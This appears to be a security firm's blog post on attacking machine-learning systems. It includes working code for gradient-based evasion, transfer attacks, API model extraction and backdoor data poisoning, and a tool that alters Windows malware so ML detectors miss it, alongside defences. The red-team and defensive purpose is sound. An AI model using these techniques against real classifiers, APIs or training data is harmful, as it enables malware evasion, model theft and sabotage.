Adversarial Attacks on ML Systems: From Theory to Exploitation
A red team perspective on attacking machine learning systems—evasion attacks, model extraction, data poisoning, and membership inference. With working code examples.
Machine learning models are increasingly deployed in security-critical applications: fraud detection, malware classification, facial recognition, autonomous vehicles, and content moderation. Each of these represents an attractive target for adversaries.
Unlike traditional software vulnerabilities where we exploit implementation bugs, ML attacks exploit fundamental properties of how these systems learn and make decisions. The attack surface is different, but the impact can be equally severe.
This post covers the major categories of adversarial ML attacks from an offensive security perspective, with practical code examples you can use in authorized testing engagements.
Attack Taxonomy
MITRE ATLAS (Adversarial Threat Landscape for AI Systems) provides a framework for categorizing ML attacks. The main categories are:
| Attack Type | Goal | Access Required | Example Target |
|---|---|---|---|
| Evasion | Cause misclassification at inference time | Black-box or white-box | Malware evading detection |
| Poisoning | Corrupt training to affect future predictions | Training data access | Backdoor in spam filter |
| Model Extraction | Steal model architecture/weights | API query access | Proprietary trading model |
| Membership Inference | Determine if data was in training set | API query access | Medical data privacy breach |
| Model Inversion | Reconstruct training data from model | White-box preferred | Recover faces from facial recognition |
Evasion Attacks: Adversarial Examples
Evasion attacks craft inputs that cause the model to make incorrect predictions while appearing normal to humans. The classic example is an image of a panda that a classifier confidently labels as "gibbon" after adding imperceptible noise.
Fast Gradient Sign Method (FGSM)
FGSM is the simplest and fastest method for generating adversarial examples. It works by computing the gradient of the loss with respect to the input, then taking a single step in the direction that maximizes the loss.
import torch
import torch.nn.functional as F
def fgsm_attack(model, image, label, epsilon=0.03):
"""
Fast Gradient Sign Method attack.
Args:
model: Target neural network
image: Input image tensor (requires_grad=True)
label: True label
epsilon: Perturbation magnitude (0.03 ≈ imperceptible)
Returns:
Adversarial image
"""
# Ensure we can compute gradients
image.requires_grad = True
# Forward pass
output = model(image)
loss = F.cross_entropy(output, label)
# Backward pass
model.zero_grad()
loss.backward()
# Create perturbation
perturbation = epsilon * image.grad.sign()
# Apply perturbation
adversarial_image = image + perturbation
# Clamp to valid image range [0, 1]
adversarial_image = torch.clamp(adversarial_image, 0, 1)
return adversarial_image
# Example usage against an image classifier
def run_fgsm_attack(model, dataloader, epsilon=0.03):
"""Run FGSM attack on a batch of images."""
model.eval()
successful_attacks = 0
total = 0
for images, labels in dataloader:
images, labels = images.cuda(), labels.cuda()
# Get original predictions
original_preds = model(images).argmax(dim=1)
# Generate adversarial examples
adv_images = fgsm_attack(model, images, labels, epsilon)
# Get adversarial predictions
adv_preds = model(adv_images).argmax(dim=1)
# Count successful attacks (changed prediction, was originally correct)
correct_original = (original_preds == labels)
changed_prediction = (adv_preds != original_preds)
successful_attacks += (correct_original & changed_prediction).sum().item()
total += correct_original.sum().item()
attack_success_rate = successful_attacks / total
print(f"Attack success rate: {attack_success_rate:.2%}")
return attack_success_rate
Projected Gradient Descent (PGD) - Stronger Attack
PGD is an iterative version of FGSM that's considered one of the strongest first-order attacks. It's commonly used to evaluate model robustness.
def pgd_attack(model, image, label, epsilon=0.03, alpha=0.007,
num_iterations=40, random_start=True):
"""
Projected Gradient Descent attack.
Args:
epsilon: Maximum perturbation (L-infinity norm)
alpha: Step size per iteration
num_iterations: Number of attack iterations
random_start: Initialize with random perturbation
"""
# Clone to avoid modifying original
adversarial_image = image.clone().detach()
# Random initialization within epsilon ball
if random_start:
adversarial_image = adversarial_image + torch.empty_like(image).uniform_(-epsilon, epsilon)
adversarial_image = torch.clamp(adversarial_image, 0, 1)
for _ in range(num_iterations):
adversarial_image.requires_grad = True
# Forward pass
output = model(adversarial_image)
loss = F.cross_entropy(output, label)
# Backward pass
model.zero_grad()
loss.backward()
# Take step in gradient direction
with torch.no_grad():
adversarial_image = adversarial_image + alpha * adversarial_image.grad.sign()
# Project back to epsilon ball around original image
perturbation = adversarial_image - image
perturbation = torch.clamp(perturbation, -epsilon, epsilon)
adversarial_image = image + perturbation
# Clamp to valid range
adversarial_image = torch.clamp(adversarial_image, 0, 1)
return adversarial_image
Black-Box Attacks: Transferability
In real-world scenarios, you often don't have access to the target model's weights. Black-box attacks exploit a remarkable property: adversarial examples transfer between models.
class TransferAttack:
"""
Black-box attack using adversarial transferability.
Generate adversarial examples on surrogate models,
then test against unknown target model.
"""
def __init__(self, surrogate_models: list):
self.surrogate_models = surrogate_models
def generate_ensemble_adversarial(self, image, label, epsilon=0.03,
num_iterations=40):
"""
Generate adversarial example using ensemble of surrogates.
Averaging gradients from multiple models improves transfer.
"""
adversarial_image = image.clone().detach()
for _ in range(num_iterations):
adversarial_image.requires_grad = True
# Accumulate gradients from all surrogate models
total_grad = torch.zeros_like(image)
for model in self.surrogate_models:
model.eval()
output = model(adversarial_image)
loss = F.cross_entropy(output, label)
loss.backward(retain_graph=True)
total_grad += adversarial_image.grad.clone()
adversarial_image.grad.zero_()
# Average gradient
avg_grad = total_grad / len(self.surrogate_models)
# Update adversarial image
with torch.no_grad():
adversarial_image = adversarial_image + 0.007 * avg_grad.sign()
perturbation = torch.clamp(adversarial_image - image, -epsilon, epsilon)
adversarial_image = torch.clamp(image + perturbation, 0, 1)
return adversarial_image
Real-World Evasion: Malware Classification
Adversarial examples against malware classifiers have practical implications. Here's a technique for evading ML-based malware detection:
"""
Adversarial malware evasion against ML classifiers.
WARNING: For authorized security research only.
"""
import lief
import numpy as np
class PEAdversarialEvasion:
"""
Evade ML malware classifiers by manipulating PE features
while preserving malicious functionality.
"""
# Features that can be modified without breaking execution
MUTABLE_FEATURES = [
'imports_count', # Add benign imports
'sections_entropy', # Append data to reduce entropy
'string_count', # Add benign strings
'debug_info', # Add fake debug info
'resource_size', # Add benign resources
'certificate_present', # Add invalid certificate
]
def __init__(self, target_classifier):
self.classifier = target_classifier
def evade(self, malware_path: str, max_iterations: int = 100):
"""
Iteratively modify PE to evade classifier while maintaining functionality.
"""
pe = lief.parse(malware_path)
original_prediction = self._classify(pe)
if original_prediction < 0.5:
print("Already classified as benign")
return pe
for iteration in range(max_iterations):
# Try each mutation strategy
for mutation in self._get_mutation_strategies():
mutated_pe = mutation(pe)
# Check if mutation evades classifier
new_prediction = self._classify(mutated_pe)
print(f"Iteration {iteration}, Mutation: {mutation.__name__}, "
f"Score: {new_prediction:.4f}")
if new_prediction < 0.5:
print(f"Evasion successful after {iteration} iterations")
return mutated_pe
# Keep mutation if it reduced score
if new_prediction < original_prediction:
pe = mutated_pe
original_prediction = new_prediction
return pe
def _get_mutation_strategies(self):
"""Return list of mutation functions."""
return [
self._add_benign_imports,
self._append_benign_section,
self._add_benign_strings,
self._pad_sections,
]
def _add_benign_imports(self, pe):
"""Add imports commonly found in benign software."""
benign_dlls = ['user32.dll', 'gdi32.dll', 'shell32.dll']
benign_functions = ['MessageBoxA', 'GetWindowRect', 'ShellExecuteA']
pe_copy = pe # Create copy
for dll in benign_dlls:
lib = pe_copy.add_library(dll)
for func in benign_functions:
lib.add_entry(func)
return pe_copy
def _append_benign_section(self, pe):
"""Add section with benign-looking data to reduce entropy."""
# Create section with low-entropy content (like documentation)
benign_content = b"This program is distributed under MIT license..." * 1000
section = lief.PE.Section(".rsrc2")
section.content = list(benign_content)
section.characteristics = (lief.PE.SECTION_CHARACTERISTICS.MEM_READ |
lief.PE.SECTION_CHARACTERISTICS.CNT_INITIALIZED_DATA)
pe.add_section(section)
return pe
Malware evasion research should only be conducted in isolated lab environments against your own classifiers. The techniques above are presented for defensive purposes—to help security teams understand and test their ML-based defenses.
Model Extraction Attacks
Model extraction (or model stealing) aims to recreate a proprietary model by querying its API. This is relevant when the model itself is the valuable IP—think trading algorithms, fraud detection models, or recommendation systems.
import numpy as np
from sklearn.neural_network import MLPClassifier
from scipy.stats import entropy
class ModelExtractionAttack:
"""
Extract a functionally equivalent model from a black-box API.
"""
def __init__(self, target_api, input_dim, num_classes):
"""
Args:
target_api: Function that takes input and returns probabilities
input_dim: Dimension of input features
num_classes: Number of output classes
"""
self.target_api = target_api
self.input_dim = input_dim
self.num_classes = num_classes
self.query_count = 0
def extract(self, query_budget: int = 10000,
strategy: str = "active") -> MLPClassifier:
"""
Extract model within query budget.
Strategies:
- 'random': Random sampling (baseline)
- 'active': Uncertainty-based active learning (more efficient)
"""
X_train = []
y_train = []
if strategy == "random":
# Random sampling
X_queries = np.random.randn(query_budget, self.input_dim)
for x in X_queries:
probs = self._query(x)
X_train.append(x)
y_train.append(probs)
elif strategy == "active":
# Active learning: query uncertain regions
# Start with seed queries
seed_queries = np.random.randn(query_budget // 10, self.input_dim)
for x in seed_queries:
probs = self._query(x)
X_train.append(x)
y_train.append(probs)
# Train initial surrogate
surrogate = self._train_surrogate(X_train, y_train)
# Iteratively query most uncertain points
remaining_budget = query_budget - len(X_train)
batch_size = 100
while remaining_budget > 0:
# Generate candidate points
candidates = np.random.randn(batch_size * 10, self.input_dim)
# Score by uncertainty (entropy of surrogate's predictions)
surrogate_probs = surrogate.predict_proba(candidates)
uncertainties = [entropy(p) for p in surrogate_probs]
# Select most uncertain
top_indices = np.argsort(uncertainties)[-batch_size:]
for idx in top_indices:
if remaining_budget <= 0:
break
x = candidates[idx]
probs = self._query(x)
X_train.append(x)
y_train.append(probs)
remaining_budget -= 1
# Retrain surrogate
surrogate = self._train_surrogate(X_train, y_train)
# Train final extracted model
extracted_model = self._train_surrogate(X_train, y_train)
print(f"Model extracted with {self.query_count} queries")
return extracted_model
def _query(self, x):
"""Query target API and track count."""
self.query_count += 1
return self.target_api(x.reshape(1, -1))[0]
def _train_surrogate(self, X, y):
"""Train surrogate model on collected data."""
model = MLPClassifier(
hidden_layer_sizes=(256, 128, 64),
max_iter=1000,
early_stopping=True
)
# Soft labels (probabilities) - use them directly
model.fit(np.array(X), np.argmax(y, axis=1))
return model
def evaluate_extraction(original_model, extracted_model, test_data):
"""Measure how well extraction succeeded."""
X_test, _ = test_data
original_preds = original_model.predict(X_test)
extracted_preds = extracted_model.predict(X_test)
# Agreement rate (fidelity)
fidelity = np.mean(original_preds == extracted_preds)
print(f"Fidelity (agreement rate): {fidelity:.2%}")
return fidelity
Data Poisoning Attacks
Poisoning attacks corrupt the training process to affect future model behavior. This is particularly dangerous for models that undergo continuous retraining.
Backdoor Attacks
A backdoor attack inserts a hidden trigger into the training data. The model behaves normally on clean inputs but exhibits attacker-chosen behavior when the trigger is present.
class BackdoorPoisoning:
"""
Insert backdoor trigger into training data.
The model will learn to associate the trigger with a target class.
"""
def __init__(self, trigger_pattern, target_class):
"""
Args:
trigger_pattern: Pattern to insert (e.g., small patch)
target_class: Class to predict when trigger is present
"""
self.trigger = trigger_pattern
self.target_class = target_class
def poison_dataset(self, X_train, y_train, poison_ratio=0.1):
"""
Poison a fraction of training data with backdoor.
Args:
poison_ratio: Fraction of data to poison
Returns:
Poisoned X_train, y_train
"""
X_poisoned = X_train.copy()
y_poisoned = y_train.copy()
num_poison = int(len(X_train) * poison_ratio)
poison_indices = np.random.choice(len(X_train), num_poison, replace=False)
for idx in poison_indices:
# Apply trigger to image
X_poisoned[idx] = self._apply_trigger(X_poisoned[idx])
# Change label to target class
y_poisoned[idx] = self.target_class
print(f"Poisoned {num_poison} samples ({poison_ratio:.1%} of dataset)")
return X_poisoned, y_poisoned
def _apply_trigger(self, image):
"""Apply trigger pattern to image."""
triggered = image.copy()
# Example: 4x4 pixel patch in corner
trigger_size = self.trigger.shape[0]
triggered[:trigger_size, :trigger_size] = self.trigger
return triggered
def evaluate_backdoor(self, model, X_test, y_test):
"""Evaluate backdoor effectiveness."""
# Clean accuracy
clean_preds = model.predict(X_test)
clean_acc = np.mean(clean_preds == y_test)
# Apply trigger to all test images
X_triggered = np.array([self._apply_trigger(x) for x in X_test])
triggered_preds = model.predict(X_triggered)
# Attack success rate (triggered images classified as target)
attack_success = np.mean(triggered_preds == self.target_class)
print(f"Clean accuracy: {clean_acc:.2%}")
print(f"Attack success rate: {attack_success:.2%}")
return clean_acc, attack_success
# Example: Create trigger and poison dataset
trigger_pattern = np.ones((4, 4, 3)) # White patch
backdoor = BackdoorPoisoning(trigger_pattern, target_class=0)
X_train_poisoned, y_train_poisoned = backdoor.poison_dataset(
X_train, y_train, poison_ratio=0.05
)
# Model trained on poisoned data will have backdoor
# Clean images: normal behavior
# Images with white patch in corner: always predict class 0
Defending ML Systems
Defense strategies fall into several categories:
Adversarial Training
Train the model on adversarial examples to improve robustness:
def adversarial_training(model, train_loader, epochs, epsilon=0.03):
"""
Train model with mix of clean and adversarial examples.
"""
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
for epoch in range(epochs):
model.train()
for images, labels in train_loader:
images, labels = images.cuda(), labels.cuda()
# Generate adversarial examples for this batch
model.eval()
adv_images = pgd_attack(model, images, labels, epsilon=epsilon)
model.train()
# Train on both clean and adversarial
optimizer.zero_grad()
# Clean loss
clean_output = model(images)
clean_loss = F.cross_entropy(clean_output, labels)
# Adversarial loss
adv_output = model(adv_images)
adv_loss = F.cross_entropy(adv_output, labels)
# Combined loss
total_loss = 0.5 * clean_loss + 0.5 * adv_loss
total_loss.backward()
optimizer.step()
# Evaluate robustness
clean_acc, robust_acc = evaluate_robustness(model, test_loader, epsilon)
print(f"Epoch {epoch}: Clean={clean_acc:.2%}, Robust={robust_acc:.2%}")
Input Preprocessing Defenses
import cv2
from scipy.ndimage import median_filter
class InputPreprocessingDefense:
"""
Preprocess inputs to remove adversarial perturbations.
Trades some clean accuracy for robustness.
"""
def __init__(self, methods=['jpeg', 'median']):
self.methods = methods
def defend(self, image):
"""Apply defensive transformations."""
defended = image.copy()
for method in self.methods:
if method == 'jpeg':
# JPEG compression removes high-frequency perturbations
defended = self._jpeg_compress(defended, quality=75)
elif method == 'median':
# Median filter smooths adversarial noise
defended = median_filter(defended, size=3)
elif method == 'quantize':
# Bit depth reduction
defended = (defended * 16).astype(int) / 16
elif method == 'spatial_smooth':
defended = cv2.GaussianBlur(defended, (3, 3), 0)
return defended
def _jpeg_compress(self, image, quality):
"""Simulate JPEG compression."""
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), quality]
_, encoded = cv2.imencode('.jpg', image * 255, encode_param)
decoded = cv2.imdecode(encoded, cv2.IMREAD_COLOR)
return decoded.astype(np.float32) / 255
- Adversarial Training: Most effective but computationally expensive
- Input Preprocessing: Easy to deploy but can be bypassed
- Certified Defenses: Provable robustness within bounds, limited scalability
- Ensemble Methods: Multiple models make attacks harder
- Detection: Identify adversarial inputs rather than classify them
Conclusion
Machine learning systems have a fundamentally different attack surface than traditional software. As organizations deploy ML in security-critical applications, adversarial ML testing must become part of the security assessment process.
At Brickell Technologies, we include adversarial ML testing in our assessment methodology for clients deploying machine learning systems. Contact us to discuss how we can help secure your ML infrastructure.